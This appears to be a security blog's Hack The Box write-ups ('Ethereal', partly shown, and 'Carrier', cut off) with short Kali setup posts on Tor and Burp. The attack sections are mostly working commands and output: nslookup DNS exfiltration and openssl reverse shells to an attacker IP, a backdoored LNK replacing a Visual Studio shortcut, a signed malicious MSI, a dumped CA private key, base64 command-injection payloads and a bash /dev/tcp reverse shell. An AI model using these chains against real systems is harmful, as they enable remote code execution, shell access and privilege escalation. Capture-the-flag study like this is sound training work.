# 10.10.14.23 & for /f "tokens=1,2,3,4,5,6,7,8" %a in ('type C:\users\public\desktop\shortcuts\fw.txt') do nslookup %a.%b.%c.%d.%e.%f.%g.%h 10.10.14.23
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Reply
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.UDP.Port.53
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.TCP.Ports.73.136
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.Port.80.8080
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Request
[*] [DNS] Poisoned answer sent to: 10.10.10.106     Requested name: .Rule.Name.Allow.ICMP.Reply

According to this information, we have 2 ports for connection 73, 136.
Then, try to have a remote connection

root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a RSA private key
.................................................................................................................................++++
..........................++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
root@kali:~# ls -la 
-rw-r--r-- 1 root root 1939 Mar 10 13:25 cert.pem
-rw------- 1 root root 3272 Mar 10 13:24 key.pem
# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:73 | cmd.exe | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 73

Pinging 10.10.14.23 with 32 bytes of data:
Reply from 10.10.14.23: bytes=32 time=34ms TTL=63
Reply from 10.10.14.23: bytes=32 time=38ms TTL=63

Ping statistics for 10.10.14.23:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 34ms, Maximum = 38ms, Average = 36ms

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>

After that, by writting a command on terminal port 73 and refrashing the page, we can execute our commands.

 Directory of C:\users\alan\desktop

07/07/2018  11:08 PM    <DIR>          .
07/07/2018  11:08 PM    <DIR>          ..
07/07/2018  11:07 PM               160 note-draft.txt
               1 File(s)            160 bytes
               2 Dir(s)  15,437,340,672 bytes free
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

There is no user.txt in C:\Users\alan\desktop.
However, there is an interesting text file.

c:\windows\system32\inetsrv>type C:\users\alan\desktop\note-draft.txt
I've created a shortcut for VS on the Public Desktop to ensure we use the same version. Please delete any existing shortcuts and use this one instead.

- Alan

c:\windows\system32\inetsrv>dir C:\users\public\desktop\shortcuts
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of C:\users\public\desktop\shortcuts

03/10/2019  11:01 AM    <DIR>          .
03/10/2019  11:01 AM    <DIR>          ..
03/10/2019  11:02 AM             2,494 fw.txt
07/06/2018  02:28 PM             6,125 Visual Studio 2017.lnk
               2 File(s)          8,619 bytes
               2 Dir(s)  15,436,517,376 bytes free

To take advantage of this, create our payload to obtain other user shell. We can use LNKUp.

root@kali:~/LNKUp# python generate.py --host localhost --type ntlm --out vs-mod.lnk --execute "C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.23:73|cmd.exe|C:\Progra~2\OpenSSL-v1.1.0\bin\openssl.exe s_client -quiet -connect 10.10.14.23:136"
\
  ~==================================================~
##                                                    ##
##  /$$       /$$   /$$ /$$   /$$ /$$   /$$           ##
## | $$      | $$$ | $$| $$  /$$/| $$  | $$           ##
## | $$      | $$$$| $$| $$ /$$/ | $$  | $$  /$$$$$$  ##
## | $$      | $$ $$ $$| $$$$$/  | $$  | $$ /$$__  $$ ##
## | $$      | $$  $$$$| $$  $$  | $$  | $$| $$  \ $$ ##
## | $$      | $$\  $$$| $$\  $$ | $$  | $$| $$  | $$ ##
## | $$$$$$$$| $$ \  $$| $$ \  $$|  $$$$$$/| $$$$$$$/ ##
## |________/|__/  \__/|__/  \__/ \______/ | $$____/  ##
##                                         | $$       ##
##                                         | $$       ##
##                                         |__/       ##
  ~==================================================~

File saved to /root/LNKUp/vs-mod.lnk
Link created at vs-mod.lnk with UNC path \\localhost\Share\3910.ico.

After that, run the ssl server again which serves vs-mod.lnk.
This does not output any message in the console but don’t worry.

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136 < vs-mod.lnk
# then, run following payload to upload shell on web ping console
# 10.10.14.23 | "C:\Program Files (x86)\OpenSSL-v1.1.0\bin\openssl.exe" s_client -quiet -connect 10.10.14.23:136 > "C:\Users\Public\Desktop\Shortcuts\vs-mod.lnk"

After that, we can confirm we have vs-mod.lnk in /shortcuts.

c:\windows\system32\inetsrv>dir c:\users\public\desktop\shortcuts
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of c:\users\public\desktop\shortcuts

03/10/2019  12:28 PM    <DIR>          .
03/10/2019  12:28 PM    <DIR>          ..
03/10/2019  11:02 AM             2,494 fw.txt
07/06/2018  02:28 PM             6,125 Visual Studio 2017.lnk
03/10/2019  12:26 PM               520 vs-mod.lnk
               3 File(s)          9,139 bytes
               2 Dir(s)  15,435,431,936 bytes free

Then, change the name of “vs-mod.lnk” to “Visual Studio 2017.lnk”

# put this command on openssl server serves port 73
del "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & copy /Y "c:\users\public\desktop\shortcuts\vs-mod.lnk" "c:\users\public\desktop\shortcuts\Visual Studio 2017.lnk" & dir c:\users\public\desktop\shortcuts

c:\windows\system32\inetsrv>dir c:\users\public\desktop\shortcuts
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of c:\users\public\desktop\shortcuts

03/10/2019  12:39 PM    <DIR>          .
03/10/2019  12:39 PM    <DIR>          ..
03/10/2019  11:02 AM             2,494 fw.txt
03/10/2019  12:26 PM               520 Visual Studio 2017.lnk
03/10/2019  12:26 PM               520 vs-mod.lnk
               3 File(s)          3,534 bytes
               2 Dir(s)  15,435,128,832 bytes free

After that, immediately rerun these servers again.
A few minutes later, we can achieve user shell whose user is “jorge”.
The user.txt is as always in the directory of “desktop”.

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\jorge\Documents>whoami
whoami
ethereal\jorge

C:\Users\jorge\Documents>type C:\Users\jorge\desktop\user.txt
2b9a4ca09408b4a39d87cbcd7bd524dd

3. Getting Root

If we check other device on Ethereal, we can find additional drive “D:".

C:\Users\jorge\Documents>fsutil fsinfo drives

Drives: C:\ D:\

C:\Users\jorge\Documents>dir D:\
 Volume in drive D is Development
 Volume Serial Number is 54E5-37D1

 Directory of D:\

07/07/2018  09:50 PM    <DIR>          Certs
06/27/2018  10:30 PM    <DIR>          DEV
07/16/2018  09:54 PM    <DIR>          Program Files (x86)
06/30/2018  09:05 PM    <DIR>          ProgramData
               0 File(s)              0 bytes
               4 Dir(s)   8,437,514,240 bytes free

We can find an interesting note in D:\DEV\MSIs.

C:\Users\jorge\Documents>type D:\DEV\MSIs\note.txt
Please drop MSIs that need testing into this folder - I will review regularly. Certs have been added to the store already.

- Rupal

Sounds like we have to create a msi file which executes our payload.
Beforehand, we need some certs to sign our msi file.
We can find them in D:\Certs.

C:\Users\jorge\Documents>dir D:\certs
 Volume in drive D is Development
 Volume Serial Number is 54E5-37D1

 Directory of D:\certs

07/07/2018  09:50 PM    <DIR>          .
07/07/2018  09:50 PM    <DIR>          ..
07/01/2018  09:26 PM               772 MyCA.cer
07/01/2018  09:26 PM             1,196 MyCA.pvk
               2 File(s)          1,968 bytes
               2 Dir(s)   8,437,514,240 bytes free

C:\Users\jorge\Documents>C:\progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in D:\Certs\MyCA.cer
MIIDADCCAeigAwIBAgIQIPZoDPLffoVFfuI8gqFGajANBgkqhkiG9w0BAQsFADAQ
MQ4wDAYDVQQDEwVNeSBDQTAeFw0xODA3MDEyMTI2MzlaFw0zOTEyMzEyMzU5NTla
MBAxDjAMBgNVBAMTBU15IENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
AQEAnc1wfJAWkLGTZkTOLPigFzO5Wp+4Q6DtGHO3SxHubY3ru3caRm8y4Y5LHtlY
jc9ZP5BStiYsVtnqzJY1H+SxweLPQvpHYjSC54ZpMEt1AHKhuE9o9+2qdfNonRtK
/xLa2qcov0prPPs9LTkde5xIWw7fplAmrpvkVf4yfgSrmactNLoZby/lnG+nhsT5
j4ICZIGogo+Icn/eTy7UPCdRdfkOdzAHBX6xQfH6g/p7HGtPigH9rs4ia1cND6J+
NuPAuuLlMxpbSYE5Q1Gq8sRKdYnTMK9RfLnxa+N78qqR8R/MYr/RR4lKr2klwQm4
jWno4wAlqirjW5W7LDmBOsstNQIDAQABo1YwVDAPBgNVHRMBAf8EBTADAQH/MEEG
A1UdAQQ6MDiAEKuZwosHXc04qkkMrVgOXvShEjAQMQ4wDAYDVQQDEwVNeSBDQYIQ
IPZoDPLffoVFfuI8gqFGajANBgkqhkiG9w0BAQsFAAOCAQEAaJWYGIP0vCruQ7WP
43P0vFuwCmSLUYM+Edz+kQGBifhBnNsU+klJ18TWwazRGE4c72oAF+gNCAvfFKIq
2pbGUWaKnPzEO0znCg4pgdEIGHjNTePYngL0h76ItFlGOr4YttOIROflpk1dR6Cp
/1PwEOxZZ/9Kr9h1GVDiz2vcQW2VA8ALcgY584SKUkuKhE8Mqao78hU87e4dgXQL
KkqlkMYo7XeFa5MYZpiXCQNQNQIp1l7wAiA6mdaURtG6+PSoLZel8101iXYQbZUn
FAAiPQJ0lYyqerYP1tXtoSGUUEquiZFif3iU3VGA57L2repPbNIqOSOEmd47ZXT5
K9WXgA==

C:\progra~2\OpenSSL-v1.1.0\bin\openssl.exe base64 -in D:\Certs\MyCA.pvk
HvG1sAAAAAACAAAAAAAAAAAAAACUBAAABwIAAAAkAABSU0EyAAgAAAEAAQA1Lcs6
gTksu5Vb4yqqJQDj6GmNuAnBJWmvSolH0b9izB/xkarye+Nr8bl8Ua8w04l1SsTy
qlFDOYFJWxoz5eK6wOM2fqIPDVdrIs6u/QGKT2sce/qD+vFBsX4FBzB3Dvl1USc8
1C5P3n9yiI+CqIFkAoKP+cSGp2+c5S9vGbo0LaeZqwR+Mv5V5JuuJlCm3w5bSJx7
HTktPfs8a0q/KKfa2hL/ShudaPN1qu33aE+4oXIAdUswaYbngjRiR/pCz+LBseQf
NZbM6tlWLCa2UpA/Wc+NWNkeS47hMm9GGne7641t7hFLt3MY7aBDuJ9auTMXoPgs
zkRmk7GQFpB8cM2dcZKSZIFgfu9cfUwrnXbTQC2BzNdRgmJGHW+KXCFns7ve/Cfh
UUSEOwv+aZwivMWic+lUA3MbVE73k5SrWWAa8HfhyRGeVkClWynddhknlufRz3VT
owT8YoHrpOey+EJ48NX5kbb/lIL0qTzd4DtWbLDSI1oW+Cj3hiuQ1unQU7wF4Ukf
7jv7zghW6Bp6LoUBFd9Dxw0Irs/aVRPyLWKv1Smk7rdiZ+Ym6/upHuLBaak4L/rM
qvzeT+hoV9JkdOckXA54tEf0SYoamH2+mFwSgmenHjdHEPjKOC1FJOGacC/bKB4z
iw0AoLPAwoK+ld57HMo1mexAEfvwua3rT6WB1pHtuKszTcsw2llLlAk3C2OU8sJS
+XPjsy4564WZZJurWx10vlhPUpdKTGbF/QV+5b02FQiyR5HkWBtqKHRVyEdZB0l5
VFFUXWZBzYc//AqSfPZg19VcrGS2B8rU6oK/5dA4djw9oeYzpQDD5q6z/GlGrLCt
iwGht0fcUveev2+20QfAHkGMmK1l9ymFdABCxLxQ3RbsaRwFffzwIO7hICSjIPwP
8Lfl9SbLP1TqUhfmcWhDPNgBjvgI2HuiXOTOjqgo+ML8AP4t5ctAOV3idNqGA+8o
QfqbZIwXW8t3DhRMOQ+y+7kZAG+0Tl4W+64Z+WbpV5NQ4Lh5zSDmy0H3NookmLbM
k/+6gRKfzGSnvlxR8+yngqaJoCYziE/+F3k293lHyGz7swQ+/Pgn4VnKXJPJTHwM
Gh7npszdDimChYLZhdo8VKSPdIe1aBcwzlxWhKe8zU39ktBCVB6COH+X2rRlNXiv
vvvesEbLeD0y2vFxjWxCT1IcNMSe+NWLrRLVV1FlLtjTp+uIk8158Et7Mi5/i2h3
ic+SiTxnQceaA9VJHLXEp3yO7hKMEpH9amU41EtFVStmiRoO3S3Bv3gGmZNKxZGJ
aocRCf2Rc0AjRB2xbshYFx4hCpDPdXCZRzDIjJjxQEfl1rLxQqA5rz3/3K8SyJSL
S79t8hzxlqwZvuMkL8LJzJi4m9Bt9sc2IxMdka4oAHAvKNpoOi6fZKINibMP69xK
g7lubG3/Aft9LYH2DpSSt00WyPIqFIscvOqkzrBlJHW4Dj65gsdsBqKIvb0hdfpf
myOjgtyxIuox7xHZOTg0TjoOnw1oMAdlBLaDfRz91TDwdd5N6T83QXLy3gY=

Create a msi file

We can use Wix Toolset to create a new msi file.
At first, we have to prepare one xml which describes the msi file we create.

root@kali:~# cat ethereal.wxs 
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\vs-mod.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

Then, we have to execute following commands.
“ethereal.msi” is in a directory “C:\Program Files\WiX Toolset v3.11\bin”.

C:\Program Files\WiX Toolset v3.11\bin>candle.exe c:\tmp\ethereal.wxs
Windows Installer XML Toolset Compiler version 3.11.1.2318
Copyright (c) .NET Foundation and contributors. All rights reserved.

ethereal.wxs


C:\Program Files\WiX Toolset v3.11\bin>light.exe ethereal.wixobj
Windows Installer XML Toolset Linker version 3.11.1.2318
Copyright (c) .NET Foundation and contributors. All rights reserved.


c:\tmp\ethereal.wxs(6) : warning LGHT1079 : The cabinet 'product.cab' does not c
ontain any files.  If this installation contains no files, this warning can like
ly be safely ignored.  Otherwise, please add files to the cabinet or remove it.
c:\tmp\ethereal.wxs(10) : error LGHT0204 : ICE18: KeyPath for Component: 'Applic
ationFiles' is Directory: 'INSTALLLOCATION'. The Directory/Component pair must b
e listed in the CreateFolders table.

Sign the msi file

At first, we have to install Windows SDK.
Then, we have to decode base 64 encoded .cer file and .pvk file.
Decode MyCA.cer:

root@kali:~# cat MyCA.cer.b64 
MIIDADCCAeigAwIBAgIQIPZoDPLffoVFfuI8gqFGajANBgkqhkiG9w0BAQsFADAQ
MQ4wDAYDVQQDEwVNeSBDQTAeFw0xODA3MDEyMTI2MzlaFw0zOTEyMzEyMzU5NTla
MBAxDjAMBgNVBAMTBU15IENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
AQEAnc1wfJAWkLGTZkTOLPigFzO5Wp+4Q6DtGHO3SxHubY3ru3caRm8y4Y5LHtlY
jc9ZP5BStiYsVtnqzJY1H+SxweLPQvpHYjSC54ZpMEt1AHKhuE9o9+2qdfNonRtK
/xLa2qcov0prPPs9LTkde5xIWw7fplAmrpvkVf4yfgSrmactNLoZby/lnG+nhsT5
j4ICZIGogo+Icn/eTy7UPCdRdfkOdzAHBX6xQfH6g/p7HGtPigH9rs4ia1cND6J+
NuPAuuLlMxpbSYE5Q1Gq8sRKdYnTMK9RfLnxa+N78qqR8R/MYr/RR4lKr2klwQm4
jWno4wAlqirjW5W7LDmBOsstNQIDAQABo1YwVDAPBgNVHRMBAf8EBTADAQH/MEEG
A1UdAQQ6MDiAEKuZwosHXc04qkkMrVgOXvShEjAQMQ4wDAYDVQQDEwVNeSBDQYIQ
IPZoDPLffoVFfuI8gqFGajANBgkqhkiG9w0BAQsFAAOCAQEAaJWYGIP0vCruQ7WP
43P0vFuwCmSLUYM+Edz+kQGBifhBnNsU+klJ18TWwazRGE4c72oAF+gNCAvfFKIq
2pbGUWaKnPzEO0znCg4pgdEIGHjNTePYngL0h76ItFlGOr4YttOIROflpk1dR6Cp
/1PwEOxZZ/9Kr9h1GVDiz2vcQW2VA8ALcgY584SKUkuKhE8Mqao78hU87e4dgXQL
KkqlkMYo7XeFa5MYZpiXCQNQNQIp1l7wAiA6mdaURtG6+PSoLZel8101iXYQbZUn
FAAiPQJ0lYyqerYP1tXtoSGUUEquiZFif3iU3VGA57L2repPbNIqOSOEmd47ZXT5
K9WXgA==

root@kali:~# base64 -d MyCA.cer.b64 > MyCA.cer

Decode MyCA.pvk:

root@kali:~# cat MyCA.pvk.b64 
HvG1sAAAAAACAAAAAAAAAAAAAACUBAAABwIAAAAkAABSU0EyAAgAAAEAAQA1Lcs6
gTksu5Vb4yqqJQDj6GmNuAnBJWmvSolH0b9izB/xkarye+Nr8bl8Ua8w04l1SsTy
qlFDOYFJWxoz5eK6wOM2fqIPDVdrIs6u/QGKT2sce/qD+vFBsX4FBzB3Dvl1USc8
1C5P3n9yiI+CqIFkAoKP+cSGp2+c5S9vGbo0LaeZqwR+Mv5V5JuuJlCm3w5bSJx7
HTktPfs8a0q/KKfa2hL/ShudaPN1qu33aE+4oXIAdUswaYbngjRiR/pCz+LBseQf
NZbM6tlWLCa2UpA/Wc+NWNkeS47hMm9GGne7641t7hFLt3MY7aBDuJ9auTMXoPgs
zkRmk7GQFpB8cM2dcZKSZIFgfu9cfUwrnXbTQC2BzNdRgmJGHW+KXCFns7ve/Cfh
UUSEOwv+aZwivMWic+lUA3MbVE73k5SrWWAa8HfhyRGeVkClWynddhknlufRz3VT
owT8YoHrpOey+EJ48NX5kbb/lIL0qTzd4DtWbLDSI1oW+Cj3hiuQ1unQU7wF4Ukf
7jv7zghW6Bp6LoUBFd9Dxw0Irs/aVRPyLWKv1Smk7rdiZ+Ym6/upHuLBaak4L/rM
qvzeT+hoV9JkdOckXA54tEf0SYoamH2+mFwSgmenHjdHEPjKOC1FJOGacC/bKB4z
iw0AoLPAwoK+ld57HMo1mexAEfvwua3rT6WB1pHtuKszTcsw2llLlAk3C2OU8sJS
+XPjsy4564WZZJurWx10vlhPUpdKTGbF/QV+5b02FQiyR5HkWBtqKHRVyEdZB0l5
VFFUXWZBzYc//AqSfPZg19VcrGS2B8rU6oK/5dA4djw9oeYzpQDD5q6z/GlGrLCt
iwGht0fcUveev2+20QfAHkGMmK1l9ymFdABCxLxQ3RbsaRwFffzwIO7hICSjIPwP
8Lfl9SbLP1TqUhfmcWhDPNgBjvgI2HuiXOTOjqgo+ML8AP4t5ctAOV3idNqGA+8o
QfqbZIwXW8t3DhRMOQ+y+7kZAG+0Tl4W+64Z+WbpV5NQ4Lh5zSDmy0H3NookmLbM
k/+6gRKfzGSnvlxR8+yngqaJoCYziE/+F3k293lHyGz7swQ+/Pgn4VnKXJPJTHwM
Gh7npszdDimChYLZhdo8VKSPdIe1aBcwzlxWhKe8zU39ktBCVB6COH+X2rRlNXiv
vvvesEbLeD0y2vFxjWxCT1IcNMSe+NWLrRLVV1FlLtjTp+uIk8158Et7Mi5/i2h3
ic+SiTxnQceaA9VJHLXEp3yO7hKMEpH9amU41EtFVStmiRoO3S3Bv3gGmZNKxZGJ
aocRCf2Rc0AjRB2xbshYFx4hCpDPdXCZRzDIjJjxQEfl1rLxQqA5rz3/3K8SyJSL
S79t8hzxlqwZvuMkL8LJzJi4m9Bt9sc2IxMdka4oAHAvKNpoOi6fZKINibMP69xK
g7lubG3/Aft9LYH2DpSSt00WyPIqFIscvOqkzrBlJHW4Dj65gsdsBqKIvb0hdfpf
myOjgtyxIuox7xHZOTg0TjoOnw1oMAdlBLaDfRz91TDwdd5N6T83QXLy3gY=

root@kali:~# base64 -d MyCA.pvk.b64 > MyCA.pvk

We have to create our .pfx file and .cer file for the signature.

C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>makecert.exe -n "CN=Ethereal" -pe -cy end -ic c:\tmp\MyCA.cer -iv c:\tmp\MyCA.pvk -sky signature -sv c:\tmp\ethereal.pvk c:\tmp\ethereal.cer

Makecert.exe requires password input but we don’t need put anything ant click “ok” placeholder

Then, execute following commands.

C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>pvk2pfx.exe -pvk c:\tmp\ethereal.pvk -spc c:\tmp\ethereal.cer -pfx c:\tmp\ethereal.pfx

C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin>signtool.exe sign /f c:\tmp\ethereal.pfx c:\tmp\ethereal.msi
Done Adding Additional Store
Successfully signed: c:\tmp\ethereal.msi

After that, we have to upload the msi file. We can do this just like when we uploaded vs-mod.lnk.

C:\Users\jorge\Documents>copy c:\users\public\desktop\shortcuts\ethereal.msi d:\dev\msis\ethereal.msi & dir d:\dev\msis
        1 file(s) copied.
 Volume in drive D is Development
 Volume Serial Number is 54E5-37D1

 Directory of d:\dev\msis

03/21/2019  11:25 AM    <DIR>          .
03/21/2019  11:25 AM    <DIR>          ..
03/21/2019  10:34 AM           663,552 ethereal.msi
07/18/2018  09:47 PM               133 note.txt
               2 File(s)        663,685 bytes
               2 Dir(s)   8,436,850,688 bytes free

What we have to do is just rerun these ssl servers and wait for couple of minutes.
After that, someone executes the uploaded msi and we can achieve a root shell.

root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 136
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\>whoami
ethereal\rupal

C:\>dir c:\users\rupal\desktop
 Volume in drive C has no label.
 Volume Serial Number is FAD9-1FD5

 Directory of c:\users\rupal\desktop

10/10/2018  05:16    <DIR>          .
10/10/2018  05:16    <DIR>          ..
04/07/2018  22:01                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  15,406,366,720 bytes free

C:\>type c:\users\rupal\desktop\root.txt
1cb6f1fc220e3f2fcc0e3cd8e2d9906f

Installing Tor browser on Kali linux 2019.01

21 Mar 2019

Environment

  • OS: Kali linux 2019.1

Explanation

How to install Tor browser on Kali linux(Not manually).
If we install Tor Browser manually, it runs as root user.
Besides, it’s not good way for maintenance.

Solution

Just one simple apt-get is enough.

sudo apt-get install tor torbrowser-launcher

Setting up Burpsuite for HTTPS on Kali linux 2019.01

20 Mar 2019

Environment

  • OS: Kali linux 2019.1
  • Burp Suite: Burp Suite Community Edition v1.7.36
  • Chrome: Version 73.0.3683.75

Explanation

How to install a Burp SSL certification to chrome.
I have done this more than 5 times but still I forget so took this memo.

Solution

1. SSL Error

Without any settings, if we use Burp with https, browser shows this certification error. placeholder

2. Download SSL cert

By accessing the Burp page on localhost, we can download the certificate “cacert.der”.
We have to click on the button “CA Certificate”. placeholder

3. Register the cert on google chrome

Go to settings and click “Advanced”. There is a menu “Manage certificates”. placeholder

Click “Authorities”, then “Import”.
After selected “cacert.der” downloaded, it shows some options. placeholder

Only choosing the first one “Trust this certificate for identifying websites” is enough.

4. Restart

Then, restart the chrome and it would be fine.

5. If still had a same error?

In this case, we can confirm the validity of certification on “Manage certificates”.
Click on “org-PortSwigger” and that certificate would be “untrusted”. placeholder

We can edit the certificate, or delete and install it again.

Hackthebox Carrier Writeup

19 Mar 2019


Explanation

Hackthebox is a website which has bunch of vulnerable machines in its own VPN. This is a write-up of machine “Carrier” on that website.

Solution

1. Initial Enumeration

Port Scanning:

root@kali:~# nmap -p- 10.10.10.105 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-23 09:22 EEST
Nmap scan report for 10.10.10.105
Host is up (0.037s latency).
Not shown: 65532 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.14 seconds

Gobuster HTTP:

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,403' -u http://10.10.10.105/ -x .php

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.105/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,403
[+] Extensions   : php
[+] Timeout      : 10s
=====================================================
2018/09/23 09:56:07 Starting gobuster
=====================================================
/index.php (Status: 200)
/img (Status: 301)
/tools (Status: 301)
/doc (Status: 301)
/css (Status: 301)
/js (Status: 301)
/tickets.php (Status: 302)
/fonts (Status: 301)
/dashboard.php (Status: 302)
/debug (Status: 301)
/diag.php (Status: 302)
/server-status (Status: 403)
=====================================================
2018/09/23 10:27:10 Finished
=====================================================

UDP Scanning:

root@kali:~# nmap -sU 10.10.10.105 --top-ports 1000 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-23 18:55 EEST
Nmap scan report for 10.10.10.105
Host is up (0.037s latency).
Not shown: 998 closed ports
PORT    STATE         SERVICE VERSION
67/udp  open|filtered dhcps
161/udp open          snmp    SNMPv1 server; pysnmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: pysnmp
|   engineIDFormat: octets
|   engineIDData: 77656201ec7908
|   snmpEngineBoots: 2
|_  snmpEngineTime: 3h09m02s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1185.70 seconds

SNMP enumeration:

root@kali:~# snmpwalk -c public -v1 10.10.10.105
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"

2.Getting User

What we can find on port 80 is login console of Lyghtspeed with some Error. placeholder

By looking at “/doc/error_codef.pdf”, we can figure out what these error code means and there is an interesting line. placeholder

At the same time, we can find interesting information at “/doc/diagram_for_tac.png”.
We will use this information later. placeholder

We can guess like “SN” stands for “serial number”.
If we try some petterns of info from SNMP, we can find this credential for Lyghtspeed

admin:NET_45JDX23

After logged in, we can find an interesting page /diag.php. placeholder

Sounds like if we click “verify status” button, we have a result of linux command.
The value which we post is base64 encoded.

<input type="hidden" id="check" name="check" value="cXVhZ2dh">
<div class="form-group">
    <button type="submit" class="btn btn-primary">

Decoded value of “cXVhZ2dh” is “quagga” and This can be RCE vulnerability.
By sending arbitrary code, we can achieve user.txt.

check=aHR0cDtpZDtjYXQgL3Jvb3QvdXNlci50eHQgIyA=
# http;id;cat /root/user.txt #

placeholder

Getting Root

By taking advantage of this RCE, we can easily achieve reverse shell.

check=aHR0cDtpZDtiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIzLzQ0MyAwPiYxICMg
# http;id;bash -i >& /dev/tcp/10.10.14.23/443 0>&1 # 
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.105] 51590
bash: cannot set terminal process group (2281): Inappropriate ioctl for device
bash: no job control in this shell
root@r1:~#

Sounds like we got a root shell. However, we can not find root.txt anywhere.
This is because we’re not on 10.10.10.105

root@r1:~# ifconfig
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:d9:04:ea  
          inet addr:10.99.64.2  Bcast:10.99.64.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fed9:4ea/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:356 errors:0 dropped:0 overruns:0 frame:0
